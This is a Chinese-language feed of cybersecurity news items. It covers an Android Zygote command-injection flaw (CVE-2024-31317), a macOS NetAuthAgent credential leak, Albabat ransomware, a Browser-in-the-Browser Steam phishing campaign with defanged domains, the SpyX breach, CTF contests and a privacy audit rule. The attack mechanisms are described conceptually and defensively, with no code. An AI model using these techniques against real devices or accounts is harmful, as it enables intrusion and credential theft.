盛邦安全数据链路层加密解决方案,帮助用户在享受高效、快捷的大模型应用的同时,无需担心输入的隐私数据在上传过程中被窃取或被篡改,在保障AI新技术带来的良好体验的基础上为用户隐私和数据安全保驾护航。 原文链接
在 Android 操作系统中,研究人员发现了一个编号为 CVE-2024-31317 的严重漏洞。该漏洞允许攻击者借助 Zygote 进程,在整个系统范围内执行代码并提升权限。此缺陷影响运行 Android 11 或更早版本的设备,在 Android 生态系统中暴露出一个不容忽视的安全隐患。 背景和漏洞详细信息 Zygote 进程作为 Android 的基础组件,承担着生成新的应用程序和系统级进程的关键任务。它以系统权限运行,这使其成为了企图提升访问权限的攻击者的重点目标。 Android 启动过程的高级概述 该漏洞的根源在于系统服务器处理 “hidden_api_blacklist_exemptions” 设置的方式。这种处理方式存在缺陷,导致某些应用程序能够绕过 Android 的隐藏 API 限制。具体而言,系统服务器在向 Zygote 传递此设置时,未能正确转义换行符,这一疏忽给攻击者创造了可乘之机,他们能够向 Zygote 进程注入任意命令。 通过 ADB Shell 进行利用 攻击者可借助 Android Debug Bridge(ADB)Shell 来利用这一漏洞。ADB Shell 具备 “WRITE_SECURE_SETTINGS” 权限,能够修改 “hidden_api_blacklist_exemptions” 设置。攻击者通过向该设置注入恶意命令,就能够以系统范围的权限执行任意代码。 Android 系统服务器源代码中存在漏洞的部分。 概念验证漏洞展示了攻击者如何通过注入有效载荷来生成具有提升权限的新进程,从而将权限从普通 shell 用户提升至系统用户。据研究人员介绍,这一进程可被配置为执行诸如启动持久 shell 等命令,使得攻击者能够持续控制设备。 利用此漏洞可能引发严重后果。若漏洞未得到妥善清除,极有可能导致设备陷入启动循环。 风险缓解措施 为降低这些风险,用户可以通过 ADB Shell 删除被修改的 “hidden_api_blacklist_exemptions” 设置,然后重启设备,以此恢复 Zygote 的正常运行。不过,这一操作也会清除任何已注入的有效载荷,意味着攻击者若想重新获取提升的访问权限,需要再次重复利用该漏洞的过程。 此漏洞的发现,凸显了保护 Android 核心进程的重要性,同时也强调了及时进行漏洞修补,以防范此类安全隐患的紧迫性。
3月28日,北京威努特技术有限公司(简称“威努特”)与杭州市上城区国有资本运营集团有限公司(简称“上城资本集团”)在杭州市杭港科技大厦签署战略投资协议,正式宣布引入国有资本战略投资。上城区政府副区长陈安出席签约仪式并讲话,区科技局党委书记、局长陈刚、区数据资源局局长胡文进、区发改经信局副局长胡丽亚、四季青街道党工委副书记、办事处主任宋进军、上城资本集团董事长游文程以及威努特董事长兼CEO龙国东、副总经理石岩等参加。 这一合作进一步强化了威努特在网络安全及ICT数字化领域的发展动能,通过国有资本、地方政府与产业生态的多重协同,威努特将以杭州总部为战略支点,深度融入“中国元谷”未来产业先导区建设,为区域新质生产力跃升注入强劲动能。 国资与创新共振 构筑未来战略发展新格局 在杭州市政府“数字产业化、产业数字化”双轮驱动战略支持下,上城区通过政策引导、资源对接、场景开放等多维度推动企业高质量发展。上城资本集团作为区属国有资本投资运营主平台,此次战略投资不仅体现国有资本对科创领域的前瞻布局,更通过搭建政企协同创新平台,助力威努特的技术成果在上城落地转化。 依托“基金+基地”产融联动模式,双方将共同打造覆盖ICT全域的研发及服务全链条产业集群。其中,元宇宙作为数字经济与实体经济深度融合的前沿领域,威努特已经成功申报成为上城区元宇宙一类企业,将以此为契机,重点开辟工业元宇宙创新赛道,聚焦相关核心技术研发,推动安全、可信、智能的元宇宙解决方案在制造、能源、交通等关键领域的应用,助力中国数字经济与实体经济的协同发展。 与此同时,威努特将持续打造AI驱动的数字化新基建,以一站式解决方案引领更多用户实现安全、智能、高效的业务转型升级;进一步构建开放产业生态,依托杭州总部打造集研发与业务于一体的创新基地,协同上城资本集团推动跨领域资源整合与价值重构,携手客户与合作伙伴等生态参与者共绘数字时代的繁荣图景。 在国有资本及各方力量的凝聚下,威努特将在杭州这片创新沃土上书写高质量发展的新篇章。以杭州总部为战略支点,立足华东,辐射全国乃至全球市场,深耕网络安全、人工智能、云计算等前沿领域,为中国数字经济发展贡献更多价值,开创科技新时代! 关于上城资本集团 杭州上城区国有资本运营集团有限公司(简称“上城资本集团”)系杭州市上城区属国有企业,注册资本100亿元。作为全区唯一的国有资本运营平台,上城资本集团承载着“资源配置枢纽、资本运作引擎、战略投资先锋”三大使命。集团主要以资本运作为核心主业,重点围绕“资本运作+基金投资+产业园运营+供应链金融+融资担保”的产业战略规划,通过市场化运作,做大做强国有资本。 集团本级内设五个部门:综合管理部、计划财务部、战略投资部、风控法务部、审计监察部。下设4个子公司:杭州上城资本私募基金管理有限公司、杭州上城区产业园发展有限公司、杭州大井供应链有限公司、杭州市上城区融资担保有限公司。 截至2023年底,集团合并资产规模1782亿元,净资产达788亿元,实现合并总收入108亿元,合并利润总额9.7亿元。国内主体信用评级AAA。集团产业基金总规模100亿元,子基金合作规模达81.95亿元,产业基金累计直接或间接投资的项目245个,已退出项目69个,已有40家企业成功登陆资本市场。 关于威努特 北京威努特技术有限公司(简称“威努特”)是中国国有资本风险投资基金旗下的企业。2014年,威努特自主研发出国内第一台工业防火墙,开创了中国工控安全从无到有的历史。经过十年的发展,员工总数1000余人,在北京、杭州设立双总部,在天津、上海、广州、武汉、苏州、南京、成都建立了七大全资子公司,组建了集业务、技术、服务于一体的40个分支机构,拥有3000多家合作伙伴,致力于为全球用户提供涵盖安全、网络、云、计算在内的一站式整体解决方案,把安全数字化转型带入千行百业。 十年来,威努特始终扎根行业,将技术与客户应用场景充分融合,在科技自主创新的道路上取得了一个又一个重大突破,开发出涵盖安全、网络、云、计算在内的五大产品线120款产品,为电力、能源、交通、政府、医疗、教育、制造业等多个重要行业用户提供更贴近需求的一站式数智化解决方案和专业化服务,并赢得广泛赞誉,已成为10000家用户最信赖的首选合作伙伴。
3月29日,备受瞩目的第八届西湖论剑・中国杭州网络安全技能大赛(以下简称“西湖论剑大赛”)决赛于杭州震撼启幕。本届大赛以“人才:激发数字安全新动能”为主题,吸引了数十支精英战队、超百位顶尖选手齐聚杭州,共同投身这场网络安全领域的巅峰对决,为网络强国建设积蓄人才力量。 本届大赛由杭州市公安局、共青团杭州市委、杭州市学生联合会主办,安恒信息、杭州市网络安全研究所、杭州市网络安全协会、共青团杭州市滨江区委承办,全国数字安全行业产教融合共同体协办。杭州市公安局党委委员、副局长田国刚,杭州市学生联合会执行主席李睿杰,安恒信息党委书记、总经理张小孟,杭州市公安局网络警察分局局长徐军华,浙江省公安厅网络安全保卫总队副总队长张燕春,共青团杭州市委员会学校与权益部部长叶景明,杭州高新区滨江团工委书记汪心文,杭州市公安局网络警察分局政委严幼平,安恒信息高级副总裁、首席人才官苗春雨,杭州市公安局网络警察分局副局长褚晓勇,安恒信息副总裁、安恒安全服务总经理吴鸣旦,杭州市公安局网络安全总监、大赛裁判长吴迪,安恒信息数字人才创研院副院长叶雷鹏等嘉宾出席大赛开幕式及颁奖典礼。 智御未来 重构AI+安全新生态 今年《政府工作报告》提出持续推进“人工智能+”行动,支持大模型广泛应用。在这样的大背景下,AI+安全技术正成为重构网络安全新生态的关键力量。 西湖论剑大赛向来以其创新性赛制、高质量赛题、高规格办赛标准著称。本届大赛设网络攻防实战赛、创新挑战赛、可信众测赛三大赛项,结合时代发展需求,聚焦时下网络安全的关键技术和核心议题,在赛题设计中融入AI、数据安全等元素,内容包含“AI+安全”、数据安全、IoT漏洞挖掘等多个当下热点安全问题,致力于选拔出具备真才实学、勇于担当的优秀网络安全人才。 网络攻防实战赛作为最具看点的赛项,旨在挖掘实战型网络安全技术人才,通过线上初赛与线下决赛,综合考察参赛队伍网络渗透、应急响应、漏洞挖掘等多方面的知识技能和实战能力。创新挑战赛聚焦网络安全产业高质量发展需求,通过政府搭台、企业出题、人才创新的模式,致力于打通教育链、创新链、产业链,真正解决行业技术难题,创新人才评价体系,为优秀人才的脱颖而出创造条件。可信众测赛作为大赛的重要一环,旨在通过网络安全评估,发现和解决系统及应用程序中的安全漏洞和风险,在实战中锻炼提升网络安全从业者的技艺水平,激发创新精神,开拓攻防对抗新思路。 开幕式上,杭州市公安局党委委员、副局长田国刚在致辞中表示:“杭州作为数字经济与人工智能的高地,承载着数字中国建设的重任。数字未来的竞争,本质是安全生态的竞争;网络安全的较量,终究是人才的较量。面对人工智能带来的安全变革,我们更需要跨界协作,培养既懂AI算法又精攻防实战的复合型人才,共同构建数字时代的‘安全命运共同体’。期待通过本次大赛,见证技术巅峰的对决,推动产学研用的深度融合。” 安恒信息党委书记、总经理张小孟在致辞中强调,人才是网络安全的首要资源,是抵御威胁、推动创新的核心动能。杭州不仅是“数字之城”,更是城市与青年双向奔赴的舞台。近年来,杭州以青年需求为导向,发布各项青年人才政策,形成“产学研用”协同生态。“我们期待各位能够来到杭州这座亚运之城、创新之城的沃土上,承载梦想,实现突破,共同书写‘青年与城市双向奔赴’的新篇章!” 第八届西湖论剑大赛自开赛以来,共吸引了436所高校和10余家企业的842支队伍、4169名豪杰参赛,更有海外侠客慕名而来。经过线上初赛的激烈比拼后,32支技能强队从初赛中脱颖而出,亮相网络攻防实战赛决赛现场;15支网络安全创新优胜队齐聚创新挑战赛争锋。各战队充分发扬创新精神,以高度的责任感和使命感,在综合虚拟仿真、技术创新、真实漏洞挖掘等关键领域,取得了令人瞩目的优异成绩。 以赛为媒 引领AI时代新质生产力发展 步入决赛现场,紧张与激情交织的氛围扑面而来。参赛队伍大显身手,对网络防御策略进行优化,将AI深度融合进攻防体系,实现了从“工具赋能”到“认知重构”的跨越式突破,全方位展现出对网络安全的深度洞察与高效应对能力。 参赛的网络安全人才,凭借前沿智慧、专业知识、创新思维与默契协作,在这场巅峰对决中脱颖而出。经过数小时的鏖战,北京邮电大学“天枢Dubhe战队”以总分第一的成绩问鼎网络攻防实战赛冠军宝座,捧起了属于荣耀者的奖杯。与此同时,来自北京邮电大学&北京理工大学的bak战队、中国科学技术大学的柒战队、浙江信安数智科技有限公司的浙江信安数智战队获得创新挑战赛一等奖,《层层深入-信息综合利用获取目标权限》作品、《0day 组合拳》作品获得可信众测赛一等奖,成为开启数字安全新篇章的领航者。 在AI与数字安全深度融合的浪潮下,本届大赛不仅是一场技术实力的较量,更成为展现“AI+安全”新质生产力的重要窗口。 “人工智能、边缘计算等新兴信息技术和各行各业的融合与交叉已成为不可避免的趋势。作为新质生产力的代表,人工智能与其他技术的结合,将为各行各业注入新的活力。伴随着AI技术的广泛应用,其模型安全、内容安全和应用安全问题也日益凸显,成为我们必须关注的焦点,如何利用AI这一新兴生产力来推动网络安全技术的创新和产业的发展,将成为我们未来人才培养的关键方向。”安恒信息高级副总裁、首席人才官苗春雨在采访中介绍,针对AI的应用,今年的赛题中特意加入了两方面的赛题:一方面是“AI for security”,另一方面是“security in AI”。 “为了保证人才选拔的公平公正,本届赛事专门制定了一系列的裁判机制、监督机制。”杭州市公安局网络安全总监、大赛裁判长吴迪介绍,“大赛还专门设定了仲裁机构,对赛事争议进行处理,确保大赛结果公平公正。” 以剑为笔 绘就网络安全人才培养新蓝图 自创办伊始,西湖论剑大赛便将挖掘网络安全人才视为核心使命,凭借实战化竞赛模式,开辟出人才培养的“源头活水”。在这八年的历程中,大赛在杭州市公安局等主办方的精心组织下,积极搭建网安人才成长平台,通过激烈的竞技比拼与专家的悉心指导,为社会源源不断地输送了大批兼具家国情怀、人文素养和职业道德的优秀人才,已然成为中国网络安全领域当之无愧的“黄埔军校”,参赛人员累计超1.7万。 置身AI与数字化浪潮的当下,赛事积极求变,持续厚植人才发展沃土。一方面,深化技术攻关,鼓励参赛队伍将前沿技术融入网络安全攻防实践。另一方面,大力推进产教融合,携手高校、政府、企业,将大赛中的创新成果与实践经验引入教学与产业应用,让理论知识与实战技能紧密结合,加速培育适应时代需求的网络安全专业人才。赛后,西湖论剑大赛特别活动——“恒星与你:网络安全人才交流会”在安恒大厦举行,杭州市滨江区人社、区团工委为参赛选手带来了滨江区人才政策解读,区内知名企业展开人才招募宣讲。现场,参赛选手与企业面对面深度交流,实现人才与企业的精准对接。 群侠并起,剑指苍穹。西子湖畔这场巅峰对决,既是一场技术盛宴,更是守护数字安全的庄严承诺。未来,西湖论剑大赛将继续乘风破浪,以赛为媒,凝聚更多行业力量,深耕网络安全人才的培育,助力网络安全技术的种子在数字大地生根发芽,为网络强国建设积蓄力量,为数字中国筑起安全长城!
随着个人信息处理活动日益频繁,数据泄露、滥用等安全事件频发,个人信息保护已成为关注的焦点。日前,国家网信办正式颁布《个人信息保护合规审计管理办法》(以下简称《办法》),并将于今年5月1日正式实施。《办法》的出台,是对《个人信息保护法》审计要求的细化与落实,明确审计对象、审计条件和重点审查事项,为开展个人信息保护合规审计工作提供重要依据。 《办法》通过“定期体检”与“专项检查”相结合的双重监管模式,为企业划定了清晰的合规边界,更为公众个人信息权益筑牢了制度保障,是推动企业合规治理、提升数据安全监管能力的重要里程碑。 《办法》重点内容解读 1.处理者义务:从“被动合规”到“主动合规” 《办法》推动个人信息处理者从“被动应对监管”转向“主动构建合规体系”,实现风险前置管理,明确其需承担的核心义务: 定期开展合规审计:处理超1000万人个人信息的机构,需每两年至少开展一次合规审计;其他个人信息处理者则需根据自身情况合理规划审计频次; 风险评估与整改:若监管部门发现个人信息处理者存在较大风险(如安全措施缺失、侵害众多个体权益或发生重大安全事件),需委托专业机构开展审计,并在15个工作日内完成整改并提交报告; 配合监管:个人信息处理者应配合监管机构进行监督检查,需为审计提供必要支持,保存审计报告和整改记录,并确保整改措施落地见效(依据《办法》第8、11、12条)。 2.审计机构:独立性与专业性双重要求 为确保审计结果的客观公正,《办法》对审计机构提出严格标准: 独立性:审计机构应独立、客观地开展审计,同一机构及其关联方不得连续三次审计同一对象,不得与处理者存在利益冲突; 专业性:审计机构需具备相关资质和专业能力,适配审计人员、场所、设施及资金; 保密义务:审计过程中获知的个人信息、商业秘密等必须严格保密,并在结束后及时删除(依据《办法》第7、13、14、15条)。 梆梆安全认为,选择符合资质的第三方审计机构,不仅可提升企业合规公信力,更能通过专业视角发现潜在合规漏洞。 3.审计内容:多维度、全流程审计可系统性排查合规隐患 《办法》附件《个人信息保护合规审计指引》细化27项审查要点,涵盖核心维度如下: 合法性审查:审计处理活动是否符合法律法规,包括数据收集、存储、使用、传输等各项环节; 安全性审查:评估技术和管理措施是否足以保障个人信息安全,如技术措施是否有效、应急预案是否可执行等; 透明度审查:检查个人信息处理者是否向个人充分告知处理目的、方式和范围,并获得同意; 第三方合作审查:审计处理者与第三方共享数据时是否履行了必要的合规义务,需明确委托处理、共同处理场景下的权责划分及监督机制。 4.审计程序:闭环管理确保实效 《办法》将审计流程落实为标准化四项步骤,这一闭环机制不仅提升审计效率,更通过“发现问题—整改验证”的循环,助力企业持续优化合规体系。 制定计划:个人信息处理者需制定审计计划,明确审计范围、时间和方法; 实施审查:审计机构按计划开展审计,收集和分析相关信息,依据指引逐项核查合规性; 报告编制:审计机构出具报告,提出改进建议,并由合规审计负责人签字加盖公章; 整改反馈:个人信息处理者需限期整改并向监管机构反馈整改情况(依据《办法》第9、10、11条)。 5.法律责任:高压红线激发自主合规意识 《办法》明确违规行为的法律后果,严苛的责任机制为个人信息处理者敲响警钟,将合规内化为“生存底线”。 未履行审计义务:监管部门可依法约谈、处罚; 提供虚假资料:面临行政处罚,构成犯罪的追究刑事责任; 信息泄露:机构或人员需承担民事赔偿及刑事责任(依据《办法》第18条)。 《办法》的施行标志着我国个人信息保护进入“法治化+精细化”新阶段,为个人信息处理者指明了方向,为提升个人信息保护合规水平提供了有效途径。对企业:通过合规审计构建风险“防火墙”,预防消费者投诉和监管处罚,形成数据合规背书,提升品牌竞争力;对公众:强化个人信息权益保障,增强对数字化服务的信任和信心;对行业:推动形成“政府监管+企业自律+社会监督”的协同治理生态。 个人信息保护是一场没有终点的长跑。梆梆安全作为专业的网络安全践行者,依托多年技术沉淀和实践经验,并联合专业法律顾问团队,致力于为客户提供根据企业用户业务场景,以“自动化检测+人工审查”形式,从合规检测、风险评估到整改落地的个人信息保护合规审计服务方案。赋能企业安全合规,护航业务稳定与用户信任。 未来,梆梆安全将在个人信息保护领域持续深耕,不断优化完善安全产品、解决方案和服务,为企业提供覆盖数据全生命周期的动态防护体系,以专业守护每一份数据信任,以创新驱动数字时代的安全可持续发展。
Noah Gregory 最近发表的一篇文章,着重指出了 macOS 系统中一个严重的漏洞,其编号为 CVE - 2024 - 54471。好在该漏洞已在 macOS Sequoia 15.1、macOS Sonoma 14.7.1 以及 macOS Ventura 13.7.1 的最新安全更新中得到修复。此漏洞存在暴露系统密码的风险,这也充分说明了将 macOS 设备更新至最新版本的重要性。 背景和技术细节 该漏洞利用了 macOS 中的进程间通信(IPC)机制,尤其是 Mach 内核的消息传递系统。 凭证存储在 macOS 钥匙串中 Mach 内核融合了 BSD 和 Mach 组件,是 Apple 操作系统的核心部分。据相关报告显示,它运用任务、线程、端口和消息等抽象概念来管理 IPC。端口作为通信通道,对于任务间安全地交换数据起着关键作用。然而,一旦这些机制没有得到妥善保护,就极有可能被不法分子利用。 Mach 接口生成器(MIG)在此次漏洞事件中扮演了重要角色。MIG 能够简化发送和接收 Mach 消息接口的创建过程,但它本身缺乏原生的安全防护措施。这就意味着,任何有权限向 MIG 服务器发送信息的任务,都能够在无需验证身份的情况下调用其例程。倘若 MIG 服务器缺乏对发件人的验证这一问题得不到妥善解决,将会给系统带来极大的安全隐患。 漏洞利用与修补 该漏洞是通过处理文件服务器凭据的 NetAuthAgent 守护程序被利用的。在未进行修补之前,攻击者能够向 NetAuthAgent 发送消息,从而获取任何服务器的凭据。 此次漏洞事件凸显了保护 IPC 机制的重要性,同时也表明所有任务必须对其接收到的消息的真实性进行验证。 目前,该漏洞的补丁已被包含在最近的 macOS 更新中,这再次强调了用户及时保持系统更新,以防范此类漏洞攻击的必要性。像 ipsw CLI 这类工具,能够通过定位使用与 MIG 服务器相关特定符号的二进制文件,帮助识别潜在的漏洞。不过,要是没有恰当的安全措施作为保障,这些机制依旧很容易遭到利用。 此次漏洞的曝光,凸显了保护像 macOS 这样复杂的操作系统安全所面临的持续性挑战。同时,也进一步强调了定期进行系统更新以及践行强有力的安全实践,对于保护用户数据和维护系统完整性的重要意义。
趋势科技近期的研究发现,Albabat 勒索软件出现了重大演变。如今,它不再仅仅针对 Windows 系统,还将目标对准了 Linux 和 macOS 系统。 这次扩张凸显出勒索软件团伙在利用多种操作系统以最大化其影响力方面,正变得越来越复杂。Albabat 组织一直在借助 GitHub 来简化其运营流程,并利用该平台管理配置文件以及勒索软件的基本组件。 Fiddler 显示勒索软件配置的下载 扩大目标和提高运营效率 Albabat 勒索软件的最新版本,具体指 2.0.0 和 2.5 版本,除了 Windows 系统外,还被设计用于从 Linux 和 macOS 设备收集系统和硬件信息。 用于收集 Linux 和 macOS 系统上的硬件和系统信息的脚本 这些版本通过 GitHub REST API 检索其配置数据,使用标有 “Awesome App” 的 “User - Agent” 字符串。 根据趋势科技的报告,此配置提供了有关勒索软件行为和操作参数的关键细节,显示出一种管理和更新恶意软件的复杂方式。GitHub 的使用让攻击者能够对勒索软件的配置进行集中控制,使得更新和调整他们的策略变得更加容易。 该勒索软件会加密各种文件扩展名,常见格式包括.exe、.lnk、.dll、.mp3 等,同时会跳过特定的文件夹和文件,以避免被发现或干扰系统操作。它还会终止各种进程,比如任务管理器和生产力软件,防止用户干扰其活动。攻击者将窃取的数据存储在 PostgreSQL 数据库中,这有助于他们追踪感染情况、监控付款情况,并且有可能出售敏感信息。 安全隐患和建议 Albabat 勒索软件能够针对多种操作系统,且利用 GitHub 提高运营效率,这突出了采取强有力网络安全措施的必要性。 组织应优先实施强大的访问控制、定期进行系统更新以及做好安全备份,以此减轻此类攻击带来的风险。 实施网络分段能够限制勒索软件的传播范围,而开展用户培训和增强安全意识的计划,则有助于防止最初的感染发生。主动安全解决方案(例如人工智能平台)能够通过预测和预防威胁,提供全面的保护,从而降低勒索软件攻击的风险。 Albabat 勒索软件仍在持续开发中,2.5 版本可能还在进一步完善,这表明这些威胁会不断演变。因此,随时了解入侵指标(IoC)并利用威胁情报,对于维持有效的网络安全防御、抵御像 Albabat 这样的新兴威胁来说,至关重要。
重庆信通设计院简介: 拥有等级保护测评、商用密码应用安全性评估、数据安全评估等服务资质,并具有中国网络安全审查技术与认证中心、中国信息安全测评中心颁发的网络安全服务资质;依托专业的精英团队,能够为客户提供专业的等级保护、商用密码、数据安全测评及咨询服务,并致力于成为集咨询、规划设计、测评、运维、攻防对抗、培训等能力于一体的综合型网络与信息安全专家。 荣誉与资质: 担任多个理事和支撑单位,如:重庆市互联网界联合会监事长单位、重庆市信息安全协会副理事长单位、重庆市互联网协会理事会成员、重庆市云计算产业协会理事单位、重庆市信息技术应用标准化技术委员会秘书单位、重庆市网络与信息安全信息通报机制-技术支持单位、市委网信办、市公安局、市通管局等的长期技术支撑单位;拥有等保测评、密评、数安评估、培训等较为丰富的网络与信息安全相关服务资质。 来源:重庆信通设计院天空实验室
近期,一种新的网络钓鱼活动将目标锁定为热门游戏《反恐精英 2》的玩家。攻击者利用名为浏览器中的浏览器(BitB)的攻击手段,在用户浏览器中展示与 Steam 登录页面极为相似的逼真窗口。 攻击者为增加钓鱼页面的可信度,选择冒充乌克兰知名电子竞技团队 Navi,以此吸引该团队的忠实粉丝。由于 Navi 在电竞圈具有较高知名度,玩家容易因对团队的信任而降低警惕。 此次活动所采用的 BitB 网络钓鱼技术,由网络安全研究员 mr. dox 于 2022 年 3 月创建。这一网络钓鱼框架使威胁行为者能够在另一个浏览器窗口内,创建具有自定义地址 URL 和标题的逼真弹出窗口。简单来说,该技术会在真实浏览器窗口(即 “浏览器中的浏览器”)内生成虚假浏览器窗口,用于制作登录页面或其他真实表单,目的是窃取用户的凭据或一次性多因素身份验证(MFA)密码(OTP)。早在 2022 年晚些时候,威胁行为者就已采用这种浏览器中的浏览器攻击方式,企图窃取 Steam 账户。 使用BitB框架的Facebook钓鱼页面 来源:mr.d0x 针对 Steam 账户 在 Silent Push 研究人员监测到的一项活动中,威胁行为者借助 YouTube 视频及其他可能的推广渠道,将潜在受害者引流至钓鱼网站。值得注意的是,这些网站均使用相同的 IP 地址,表明该活动极有可能由单个攻击者或团体策划实施。这些网站打着提供带有新皮肤的免费 CS2 战利品箱的旗号,诱惑玩家。 YouTube 上的宣传信息 来源:Silent Push 涉及的承诺提供 CS2 游戏内物品的恶意网站包括: · caserevs [.] com · caseneiv [.] com · casenaps [.] com · caseners [.] com · caseneiv [.] com · simplegive [.] cn · caseneus [.] cfd 玩家若想领取所谓的礼物,就需通过看似 Steam 登录弹出窗口的界面登录自己的 Steam 账户。但实际上,打开的这个弹出窗口并非真实的 Steam 登录窗口。攻击者运用 BitB 技术,在活动窗口内呈现出一个模仿 Steam 官方 URL 和界面的虚假登录窗口,它看似弹出窗口,实则为精心伪装的陷阱。这些虚假窗口无法调整大小,也不能像普通弹出窗口那样被拖出活动窗口范围。不过,若用户没有尝试对其进行相关交互操作,很可能难以察觉其中的恶意行为。 钓鱼页面上的虚假 Steam 登录弹窗 来源:Silent Push 攻击者实施这些攻击,旨在窃取 Steam 账户,随后在专门的灰色市场上转售。根据账户所拥有的游戏收藏规模以及游戏内物品的珍稀程度,转售价格可达数万甚至数十万美元。 Steam 账户在 playerauctions[.]com 上出售 来源:Silent Push 尽管《反恐精英 2》已推出多年,但在电子竞技社区中依旧广受欢迎。也正因如此,威胁行为者频繁利用知名团队以及职业级比赛作为诱饵,试图骗取玩家的 Steam 账户。就在上个月,Bitdefender 曾报道过一场大规模活动,该活动利用虚假的 YouTube CS2 直播以及二维码,将用户引导至声称赠送游戏内物品和加密货币的恶意网站。用户一旦点击链接进入钓鱼网站,就会被要求输入 Steam 账户凭证或连接加密货币钱包,最终却发现自己的账户凭证被盗取,加密货币钱包被劫持或清空。 为有效提升 Steam 账户的安全性,建议用户激活多重身份验证功能,启用 “Steam Guard 移动身份验证器”,并定期查看登录活动记录,以便及时发现可疑登录行为,切实保障自身账户安全。
八载磨剑西湖畔 网安群英问鼎时!第八届西湖论剑·中国杭州网络安全技能大赛自2024年12月广发英雄帖以来,报名院校数量和人数创历史新高,吸引了436所高校和10余家企业的842支队伍、4169名选手参赛。其中,创新挑战赛更是群雄并起,报名队伍数量相较前一届增长62.7%。经过初赛的激烈角逐,晋级决赛的豪强名单已然揭晓,将于3月29日展开终极对决。这场汇聚智慧与技术的巅峰之战,必将为数字中国建设注入新的活力。 晋级名单预告:群雄逐鹿,悬念待揭 本届大赛围绕AI+安全赛题全新设计,实战化、前沿化、国际化兼备,考察技能与社会热点紧密相连,涵盖数据安全、AI+安全等领域。赛事共设网络攻防实战、创新挑战、可信众测三项,全面检验选手的创新能力、实战技艺与团队协作能力。清华大学、中国人民公安大学、北邮、华中科技大学、中国科学院大学等众多985、211高校战队代表纷纷亮相、同台争锋。 大赛自启动以来,吸引了全国众多高校及企业战队的踊跃参与,经过层层筛选,初赛结果已尘埃落定,网络攻防实战32支战队、创新挑战赛15支战队,脱颖而出晋级决赛。 决赛具体名单如下: 这些晋级战队在初赛中展现了高超的技术水平和团队协作能力,他们的对决将是一场智慧与技术的传奇盛宴。 决赛亮点:剑走偏锋,创新为魂 本届大赛决赛赛题将紧扣“人工智能+安全”主题,涵盖现阶段热门的生成式AI+安全对抗攻击、安全防护、IoT设备漏洞链式利用等高难度场景,部分赛题更是模拟国家级APT攻击的防御实战。 据大赛主办方透露,网络攻防实战赛的决赛分为攻防实战、数据安全、IOT 挑战,基本是前几届大赛的延续,通过仿真的网络空间靶场,构建模拟的真实业务与事件场景。同时将安恒信息恒星实验室自主研发的IoT设备应用于赛场,打造基于硬件设备的IoT攻防竞赛模式,综合考察参赛选手的网络安全技能。 创新挑战赛通过政府搭台、企业出题、人才创新的模式,真正解决行业技术难题。赛事共分为三个赛题,同时开赛,赛题与AI+安全、数据安全紧密相关。 可信众测赛由专家统一评审,结果将在决赛现场揭晓并颁奖。 赛事日程:剑锋所指,决战在即 2025年3月29日,第八届西湖论剑·中国杭州网络安全技能大赛决战一触即发!具体赛程如下: 09:30-10:00 决赛开幕式 10:00-16:00 网络攻防实战赛决赛 10:00-16:00 创新挑战赛决赛答辩评审 16:00-16:40 统分休息 16:40-17:30 颁奖典礼 更多赛事详情及晋级名单,请关注“西湖论剑网络安全技能大赛”官方网站及微信公众号。 坚守初心,续写网安传奇 西湖论剑网安大赛始终致力于网络安全人才的培育与选拔,成立至今,已经历经八个年头。历届赛事中,英雄辈出,参赛人数已累计达到17000余人次,超4000支战队,覆盖全国600多所高校和数十家企业。他们在这片战场上留下了一段段不朽的传奇。 今年,各路英豪再次汇聚于此,共赴这场网安武林的巅峰对决,共同书写新的篇章。3月29日,让我们齐聚西子湖畔,共同见证新时代网安英雄的诞生! 八载“西湖论剑”,不仅是一场技术的博弈,更是一曲人才与时代的共鸣。在这里,青年才俊以代码为剑、以算法为盾,守护数字中国的万里疆域。
SpyX 是一家因开发间谍软件而声名狼藉的公司,该公司遭遇了数据泄露事件,致使近 200 万用户的个人信息被泄露。 根据 Have I been Pwned 发布的一份报告,此次泄密事件发生在 2024 年 6 月 24 日,大量敏感数据遭到泄露,其中包括电子邮件地址、IP 地址、设备信息、地理位置以及密码。 违规详情 此次数据泄露涉及数量庞大的唯一电子邮件地址(近 200 万个),还有 IP 地址以及用户居住的国家 / 地区信息,这些信息极有可能被用于跟踪或定位个人。 此外,此次泄密还曝光了设备信息,详细呈现了受影响个人所使用的设备类型。 或许最让人忧心的是密码的泄露,其中包含存储在密码字段中的 6 位 PIN 码,这些密码可被用于未经授权地访问账户。 不仅如此,此次泄密还收集到了纯文本形式的 iCloud 凭证,该凭证可用于通过云服务直接对目标进行监控。这些 iCloud 凭证通常包含目标的电子邮件地址及其对应的 Apple 密码(纯文本),这无疑引发了极为严重的隐私和安全问题。 此次泄密事件对隐私和网络安全产生了极为深远的影响。被暴露的 iCloud 凭证,对账户被盗用的个人隐私构成了直接威胁,因为访问这些凭证无需额外的安全措施。地理位置、IP 地址和设备信息的曝光,很可能会助长跟踪、骚扰或其他恶意活动。 这项泄密事件被列入 “Have I Been Pwned”(HIBP)这一流行服务之中,该服务能够追踪数据泄露情况,并允许用户检查自己的电子邮件地址是否已经被泄露,这也凸显出此次事件的严重性。该漏洞于 2025 年 3 月 19 日被添加到 HIBP,为受影响的用户提供了评估自身信息暴露情况并采取必要预防措施的机会。 对受影响用户的建议 建议可能受到 SpyX 数据泄露影响的用户立即采取行动来保护自己: · 更改密码:及时更新与受损账户相关的所有密码,特别是 iCloud 和其他云服务的密码。 · 启用双因素身份验证 (2FA):通过启用 2FA 为账户增添额外的安全防护层,以此防止未经授权的访问。 · 监控账户:密切留意金融和其他敏感账户,查看是否存在可疑活动。 · 保持知情:定期关注此次违规事件的最新进展,并遵循 SpyX 和网络安全专家给出的建议。 虽然此次泄密事件凸显了网络安全所面临的持续挑战,但用户采取主动积极的措施,能够帮助减轻事件所带来的影响,确保营造更安全的在线环境。随着技术不断发展,隐私问题日益严峻,像 SpyX 这样的公司必须将采取强有力的安全措施放在首位,以此保护用户数据,维护用户对公司的信任。
